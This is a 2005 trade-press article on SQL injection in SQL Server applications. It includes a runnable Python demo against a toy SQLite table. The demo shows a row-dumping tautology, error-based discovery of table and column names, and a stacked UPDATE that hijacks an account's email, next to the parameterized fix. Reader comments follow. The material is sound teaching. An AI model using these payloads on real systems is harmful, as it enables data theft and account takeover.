January 06, 2005 12:00 AM

SQL Injection Attacks by Example

Windows IT Pro
InstantDoc ID #45023
If you use SQL Server as a backend for your applications, have you protected them against injection attacks? Such attacks inject attacker-chosen SQL into the statements an application builds from user input, which can lead to the inadvertent exposure of sensitive information or, in the worst case, to a total compromise of the system or network.

Steve Friedl recently released a whitepaper, "SQL Injection Attacks by Example," which walks through the steps he took during a recent security audit to penetrate a customer's system. The paper describes how he identified the services and technologies in use, how he discovered table names and column names, and how he coaxed the system into changing an email address in a table so that he could recover a valid login account name and password.
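
The three moves described above (an input-built lookup, error-driven discovery of table and column names, and a stacked UPDATE that re-points a member's email address) beside the parameterized fix, as an added example that is neither Friedl's code nor the audited site's. It uses Python's sqlite3 module as a stand-in for SQL Server; the members table, its name/email/passwd columns, the sample rows and the attacker address are constructed assumptions, and executescript() stands in for SQL Server's batch execution of stacked statements, which sqlite3's execute() refuses.

```python
import sqlite3

# Constructed sample data standing in for the audited site's member table;
# the table and column names are assumptions, not the ones from the paper.
MEMBERS = [
    ("Bob", "bob@example.com", "s3cret"),
    ("Alice", "alice@example.com", "hunter2"),
]


def make_db():
    """In-memory SQLite database (a stand-in for SQL Server) with two members."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (name TEXT, email TEXT, passwd TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?, ?)", MEMBERS)
    conn.commit()
    return conn


def vulnerable_lookup(conn, email_input):
    """'Forgot password' lookup built by string concatenation: the bug."""
    sql = f"SELECT name, email FROM members WHERE email = '{email_input}'"
    return conn.execute(sql).fetchall()


def vulnerable_lookup_batch(conn, email_input):
    """Same concatenation, run the way SQL Server runs a batch: every statement
    in the string executes. sqlite3's execute() refuses stacked statements, so
    executescript() stands in for batch execution here (it returns no rows)."""
    sql = f"SELECT name, email FROM members WHERE email = '{email_input}'"
    conn.executescript(sql)


def safe_lookup(conn, email_input):
    """The fix: a bound parameter. The input is only ever compared as data."""
    sql = "SELECT name, email FROM members WHERE email = ?"
    return conn.execute(sql, (email_input,)).fetchall()


def names_accepted(lookup, conn, candidates, make_payload):
    """Error oracle: a probe naming a missing table or column makes the server
    raise, one naming a real object just matches no row. Returns the
    candidates for which the lookup did NOT raise."""
    found = []
    for name in candidates:
        try:
            lookup(conn, make_payload(name))
            found.append(name)
        except sqlite3.OperationalError:
            pass
    return found


def table_probe(table):
    # Closes the app's opening quote, adds the subquery, then re-opens a
    # string so the app's trailing quote still parses: ... AND 'a'='a'
    return f"x' AND 1=(SELECT COUNT(*) FROM {table}) AND 'a'='a"


def column_probe(column):
    return f"x' AND {column} IS NULL AND 'a'='a"


def steal_account(conn):
    """Point Bob's row at an attacker-controlled address (assumed); a later
    'forgot password' mail for that address would carry Bob's credentials."""
    payload = ("x'; UPDATE members SET email = 'attacker@example.com' "
               "WHERE email = 'bob@example.com' AND 'a'='a")
    vulnerable_lookup_batch(conn, payload)
    return safe_lookup(conn, "attacker@example.com")


def demo():
    db = make_db()
    tables = ["users", "members", "accounts"]
    columns = ["password", "passwd", "email"]
    return {
        "dump_all": vulnerable_lookup(db, "x' OR 'a'='a"),      # both rows
        "safe_dump": safe_lookup(db, "x' OR 'a'='a"),           # []
        "tables_vuln": names_accepted(vulnerable_lookup, db, tables, table_probe),      # ['members']
        "tables_safe": names_accepted(safe_lookup, db, tables, table_probe),            # all three: oracle is blind
        "columns_vuln": names_accepted(vulnerable_lookup, db, columns, column_probe),   # ['passwd', 'email']
        "stolen": steal_account(db),                             # [('Bob', 'attacker@example.com')]
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Against the concatenated query the guessed names that exist come back without an error and the rest raise, every row is dumped by a tautology, and the stacked UPDATE re-points Bob's row at the attacker's address. Against the bound parameter every probe gets the same "no rows, no error" answer, so the oracle goes blind, and the tautology and the stacked UPDATE would both be compared as literal email addresses.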

The paper also discusses some ways to mitigate such attacks. Before you rely on Friedl's suggestions as definitive defensive measures, though, read the related message thread on the Bugtraq mailing list to see what other people had to say about them.

As we reported yesterday in the story "Microsoft WINS and SQL Server Targeted," brute-force password-guessing attempts have recently been detected against Microsoft SQL Server. Such attempts are one way to obtain SQL Server login passwords; injection attacks are another, and they can be launched by anyone from anywhere in the world if your database servers back Internet-facing Web applications, whether or not the servers themselves are reachable from the Internet. So audit the security of your SQL-based applications and the overall network exposure of the related systems to make sure you have your bases covered.

Comments
  • sujan
    7 months ago
    Oct 25, 2011

    sql injection step by step practical guide
    www.readyproject.in/sqlInjection/

  • Anonymous User
    7 years ago
    Jan 19, 2005

    -->Don't use SQL Server or any other MS product for that matter

    real developers choose the best tool for the job while wanna be developers choose 'my database' or 'my language'.

  • Anonymous User
    7 years ago
    Jan 17, 2005

    sql was always blessed with good looks, oracle needs a makeover, send forth the Fab 5 ;-)

  • Anonymous User
    7 years ago
    Jan 13, 2005

    well done genius - this applies to all SQL servers, nothing to do with MS specific

  • Anonymous User
    7 years ago
    Jan 13, 2005

    You mean use Oracle, which also admits it is liable for these attacks?

Windows is a trademark of the Microsoft group of companies. Windows IT Pro is used by Penton Media Inc. under license from owner.